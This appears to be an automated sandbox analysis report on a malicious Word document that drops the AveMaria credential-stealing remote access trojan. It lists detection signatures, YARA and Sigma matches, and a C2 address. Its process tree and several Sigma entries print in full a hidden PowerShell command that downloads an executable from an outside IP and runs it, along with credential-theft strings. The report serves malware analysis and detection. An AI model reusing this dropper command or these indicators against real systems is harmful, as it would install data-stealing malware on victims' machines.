Play interactive tour

Edit tour

Windows Analysis Report catalogue_2021_samples_list_revise_ol.doc

Overview

General Information

Sample Name:	catalogue_2021_samples_list_revise_ol.doc
Analysis ID:	492615
MD5:	84c45c2b0e94b8d1d064e739150ba84c
SHA1:	f6a98ac4e50a89495626b5eaebb85d1116554faa
SHA256:	7b5572ae246bcd3f6ee0375e1e7a8c8d4287dae4ca1803d72ae427d8ecc93a32
Tags:	AveMariaRATdoc
Infos:
Most interesting Screenshot:

Detection

AveMaria UACMe

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Document exploit detected (drops PE files)

Yara detected AntiVM3

Document exploit detected (creates forbidden files)

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Sigma detected: Powershell download and execute file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Yara detected UACMe UAC Bypass tool

Yara detected AveMaria stealer

Multi AV Scanner detection for dropped file

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

Powershell drops PE file

Hides that the sample has been downloaded from the Internet (zone.identifier)

Document exploit detected (process start blacklist hit)

Uses schtasks.exe or at.exe to add and modify task schedules

Microsoft Office creates scripting files

Office process drops PE file

Injects files into Windows application

Increases the number of concurrent connection per server for Internet Explorer

Bypasses PowerShell execution policy

Contains functionality to hide user accounts

Sigma detected: Microsoft Office Product Spawning Windows Shell

Sigma detected: PowerShell DownloadFile

Tries to download and execute files (via powershell)

Suspicious powershell command line found

Contains functionality to steal e-mail passwords

Contains functionality to steal Chrome passwords or cookies

.NET source code contains very large strings

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Contains functionality to inject threads in other processes

Found suspicious RTF objects

Contains functionality to create new users

Antivirus or Machine Learning detection for unpacked file

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Contains functionality to enumerate running services

Sigma detected: Verclsid.exe Runs COM Object

Contains functionality to dynamically determine API calls

HTTP GET or POST without a user agent

Downloads executable code via HTTP

Contains long sleeps (>= 3 min)

Potential document exploit detected (unknown TCP traffic)

PE file contains strange resources

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Contains functionality to download and execute PE files

Contains functionality to retrieve information about pressed keystrokes

Dropped file seen in connection with other malware

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Queries the volume information (name, serial number etc) of a device

Yara signature match

Internet Provider seen in connection with other malware

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Yara detected Credential Stealer

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Sigma detected: Windows PowerShell Web Request

Enables debug privileges

Installs a raw input device (often for capturing keystrokes)

Sigma detected: PowerShell Download from URL

Detected TCP or UDP traffic on non-standard ports

Contains functionality to download and launch executables

Uses Microsoft's Enhanced Cryptographic Provider

Potential document exploit detected (performs HTTP gets)

Classification

Process Tree

System is w7x64

WINWORD.EXE (PID: 2608 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)

powershell.exe (PID: 1868 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe'' MD5: 852D67A27E454BD389FA7F02A8CBE23F)

powershell.exe (PID: 2968 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe'' MD5: 852D67A27E454BD389FA7F02A8CBE23F)

doc.exe (PID: 2832 cmdline: 'C:\Users\user\AppData\Roaming\doc.exe' MD5: D8BC91E846E3D624814D4557681F33AD)

schtasks.exe (PID: 1992 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\maBdogbw' /XML 'C:\Users\user\AppData\Local\Temp\tmp2C00.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)

doc.exe (PID: 1280 cmdline: C:\Users\user\AppData\Roaming\doc.exe MD5: D8BC91E846E3D624814D4557681F33AD)

doc.exe (PID: 1188 cmdline: C:\Users\user\AppData\Roaming\doc.exe MD5: D8BC91E846E3D624814D4557681F33AD)

doc.exe (PID: 1480 cmdline: C:\Users\user\AppData\Roaming\doc.exe MD5: D8BC91E846E3D624814D4557681F33AD)

powershell.exe (PID: 1308 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe'' MD5: 852D67A27E454BD389FA7F02A8CBE23F)

verclsid.exe (PID: 1016 cmdline: 'C:\Windows\system32\verclsid.exe' /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5 MD5: 3796AE13F680D9239210513EDA590E86)

notepad.exe (PID: 2844 cmdline: 'C:\Windows\system32\NOTEPAD.EXE' 'C:\Users\user\AppData\Local\Temp\abdtfhghgeghDh .ScT' MD5: B32189BDFF6E577A92BAA61AD49264E6)

cleanup

Malware Configuration

Threatname: AveMaria

{"C2 url": "152.67.253.163", "port": 5300}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.426889851.00000000001E0000.00000004.00000020.sdmp	PowerShell_Susp_Parameter_Combo	Detects PowerShell invocation with suspicious parameters	Florian Roth	0x325b:$sb1: -W Hidden 0x324b:$sc1: -NoP 0x3255:$sd1: -NonI 0x3265:$se3: -ExecutionPolicy bypass 0x3250:$sf1: -sta
0000000E.00000003.448380598.00000000005F5000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000003.448380598.00000000005F5000.00000004.00000001.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
0000000E.00000003.448441676.00000000005F8000.00000004.00000001.sdmp	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0x400:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x400:$c1: Elevation:Administrator!new:
0000000E.00000003.448441676.00000000005F8000.00000004.00000001.sdmp	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
00000005.00000002.429130471.0000000000260000.00000004.00000020.sdmp	PowerShell_Susp_Parameter_Combo	Detects PowerShell invocation with suspicious parameters	Florian Roth	0x325b:$sb1: -W Hidden 0x324b:$sc1: -NoP 0x3255:$sd1: -NonI 0x3265:$se3: -ExecutionPolicy bypass 0x3250:$sf1: -sta
0000000E.00000003.448429506.0000000000603000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000003.448429506.0000000000603000.00000004.00000001.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
0000000E.00000003.448388466.00000000005FC000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000003.448388466.00000000005FC000.00000004.00000001.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000009.00000002.446591152.00000000023F3000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0000000E.00000003.448480834.00000000005F5000.00000004.00000001.sdmp	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0x5f8:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x5f8:$c1: Elevation:Administrator!new:
0000000E.00000003.448480834.00000000005F5000.00000004.00000001.sdmp	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
0000000E.00000003.448500555.0000000000607000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000003.448500555.0000000000607000.00000004.00000001.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
0000000E.00000002.694525179.0000000000400000.00000040.00000001.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x150e8:$a1: \Opera Software\Opera Stable\Login Data 0x15410:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x14d58:$a3: \Google\Chrome\User Data\Default\Login Data
0000000E.00000002.694525179.0000000000400000.00000040.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000002.694525179.0000000000400000.00000040.00000001.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
0000000E.00000002.694525179.0000000000400000.00000040.00000001.sdmp	AveMaria_WarZone	unknown	unknown	0x17230:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x1700c:$str2: MsgBox.exe 0x1729c:$str4: \System32\cmd.exe 0x16ee0:$str6: Ave_Maria 0x16778:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x15a78:$str8: SMTP Password 0x14d58:$str11: \Google\Chrome\User Data\Default\Login Data 0x16744:$str12: \sqlmap.dll
00000009.00000002.446479860.00000000023A1000.00000004.00000001.sdmp	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0x4c8b0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x4c8b0:$c1: Elevation:Administrator!new:
00000009.00000002.446479860.00000000023A1000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000009.00000002.446479860.00000000023A1000.00000004.00000001.sdmp	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
00000009.00000002.446479860.00000000023A1000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.446479860.00000000023A1000.00000004.00000001.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
0000000E.00000002.694590635.000000000054F000.00000040.00000001.sdmp	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0xdf0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0xdf0:$c1: Elevation:Administrator!new:
0000000E.00000002.694590635.000000000054F000.00000040.00000001.sdmp	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
00000009.00000002.448256879.00000000033A9000.00000004.00000001.sdmp	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0x2f29c0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x2f29c0:$c1: Elevation:Administrator!new:
00000009.00000002.448256879.00000000033A9000.00000004.00000001.sdmp	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
00000009.00000002.448256879.00000000033A9000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.448256879.00000000033A9000.00000004.00000001.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
Process Memory Space: powershell.exe PID: 1868	PowerShell_Susp_Parameter_Combo	Detects PowerShell invocation with suspicious parameters	Florian Roth	0x11f519:$sa2: -encodedCommand 0x11face:$sa2: -EncodedCommand 0x120208:$sa2: -EncodedCommand 0x12029f:$sa2: -encodedCommand 0x2350f:$sb1: -W Hidden 0x23747:$sb1: -W Hidden 0x2387b:$sb1: -W Hidden 0x234ff:$sc1: -NoP 0x23737:$sc1: -NoP 0x2386b:$sc1: -NoP 0x11f8c9:$sc2: -NoProfile 0x23509:$sd1: -NonI 0x23741:$sd1: -NonI 0x23875:$sd1: -NonI 0x98636:$sd1: -NonI 0x11f8f8:$sd2: -NonInteractive 0x23519:$se3: -ExecutionPolicy bypass 0x23751:$se3: -ExecutionPolicy bypass 0x23885:$se3: -ExecutionPolicy bypass 0x9863c:$se3: -ExecutionPolicy bypass 0x23504:$sf1: -sta
Process Memory Space: powershell.exe PID: 2968	PowerShell_Susp_Parameter_Combo	Detects PowerShell invocation with suspicious parameters	Florian Roth	0x1e2b81:$sa2: -encodedCommand 0x1e3136:$sa2: -EncodedCommand 0x1e3870:$sa2: -EncodedCommand 0x1e3907:$sa2: -encodedCommand 0x877be:$sb1: -W Hidden 0x87a2c:$sb1: -W Hidden 0x877ae:$sc1: -NoP 0x87a1c:$sc1: -NoP 0x1e2f31:$sc2: -NoProfile 0x877b8:$sd1: -NonI 0x87a26:$sd1: -NonI 0x8e0cc:$sd1: -NonI 0x1e2f60:$sd2: -NonInteractive 0x877c8:$se3: -ExecutionPolicy bypass 0x87a36:$se3: -ExecutionPolicy bypass 0x877b3:$sf1: -sta 0x87a21:$sf1: -sta
Click to see the 27 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
9.2.doc.exe.23ecb30.4.raw.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth	0xd80:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
9.2.doc.exe.23ecb30.4.raw.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0xd80:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0xd80:$c1: Elevation:Administrator!new:
9.2.doc.exe.23ecb30.4.raw.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
14.2.doc.exe.400000.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x150e8:$a1: \Opera Software\Opera Stable\Login Data 0x15410:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x14d58:$a3: \Google\Chrome\User Data\Default\Login Data
14.2.doc.exe.400000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
14.2.doc.exe.400000.1.raw.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
14.2.doc.exe.400000.1.raw.unpack	AveMaria_WarZone	unknown	unknown	0x17230:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x1700c:$str2: MsgBox.exe 0x1729c:$str4: \System32\cmd.exe 0x16ee0:$str6: Ave_Maria 0x16778:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x15a78:$str8: SMTP Password 0x14d58:$str11: \Google\Chrome\User Data\Default\Login Data 0x16744:$str12: \sqlmap.dll
14.2.doc.exe.400000.1.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth	0x191f0:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
14.2.doc.exe.400000.1.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0x191f0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x191f0:$c1: Elevation:Administrator!new:
14.2.doc.exe.400000.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x144e8:$a1: \Opera Software\Opera Stable\Login Data 0x14810:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x14158:$a3: \Google\Chrome\User Data\Default\Login Data
14.2.doc.exe.400000.1.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
14.2.doc.exe.400000.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
14.2.doc.exe.400000.1.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
14.2.doc.exe.400000.1.unpack	AveMaria_WarZone	unknown	unknown	0x16630:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x1640c:$str2: MsgBox.exe 0x1669c:$str4: \System32\cmd.exe 0x162e0:$str6: Ave_Maria 0x15b78:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x14e78:$str8: SMTP Password 0x14158:$str11: \Google\Chrome\User Data\Default\Login Data 0x15b44:$str12: \sqlmap.dll 0x191f0:$str16: Elevation:Administrator!new 0x19310:$str17: /n:%temp%
9.2.doc.exe.36827d0.6.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth	0x17ff0:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
9.2.doc.exe.36827d0.6.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0x17ff0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x17ff0:$c1: Elevation:Administrator!new:
9.2.doc.exe.36827d0.6.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x138e8:$a1: \Opera Software\Opera Stable\Login Data 0x13c10:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x13558:$a3: \Google\Chrome\User Data\Default\Login Data
9.2.doc.exe.36827d0.6.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
9.2.doc.exe.36827d0.6.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.doc.exe.36827d0.6.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
9.2.doc.exe.36827d0.6.unpack	AveMaria_WarZone	unknown	unknown	0x15a30:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x1580c:$str2: MsgBox.exe 0x15a9c:$str4: \System32\cmd.exe 0x156e0:$str6: Ave_Maria 0x14f78:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x14278:$str8: SMTP Password 0x13558:$str11: \Google\Chrome\User Data\Default\Login Data 0x14f44:$str12: \sqlmap.dll 0x17ff0:$str16: Elevation:Administrator!new 0x18110:$str17: /n:%temp%
9.2.doc.exe.36827d0.6.raw.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0x191f0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x191f0:$c1: Elevation:Administrator!new:
9.2.doc.exe.36827d0.6.raw.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
9.2.doc.exe.36827d0.6.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.doc.exe.36827d0.6.raw.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
9.2.doc.exe.35c4200.7.raw.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0xd77c0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0xd77c0:$c1: Elevation:Administrator!new:
9.2.doc.exe.35c4200.7.raw.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
9.2.doc.exe.35c4200.7.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.doc.exe.35c4200.7.raw.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
Click to see the 24 entries

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe'', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe'', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2608, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe'', ProcessId: 1868

Sigma detected: PowerShell DownloadFile

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe'', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe'', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2608, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe'', ProcessId: 1868

Sigma detected: Verclsid.exe Runs COM Object

Show sources

Source: Process started

Author: Victor Sergeev, oscd.community: Data: Command: 'C:\Windows\system32\verclsid.exe' /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5, CommandLine: 'C:\Windows\system32\verclsid.exe' /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5, CommandLine|base64offset|contains: , Image: C:\Windows\System32\verclsid.exe, NewProcessName: C:\Windows\System32\verclsid.exe, OriginalFileName: C:\Windows\System32\verclsid.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2608, ProcessCommandLine: 'C:\Windows\system32\verclsid.exe' /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5, ProcessId: 1016

Sigma detected: Windows PowerShell Web Request

Show sources

Source: Process started

Author: James Pemberton / @4A616D6573: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe'', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe'', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2608, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe'', ProcessId: 1868

Sigma detected: PowerShell Download from URL

Show sources

Source: Process started

Author: Florian Roth, oscd.community, Jonhnathan Ribeiro: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe'', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe'', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2608, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe'', ProcessId: 1868

Sigma detected: Non Interactive PowerShell

Show sources

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe'', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe'', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2608, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe'', ProcessId: 1868

Data Obfuscation:

Sigma detected: Powershell download and execute file

Show sources

Source: Process started

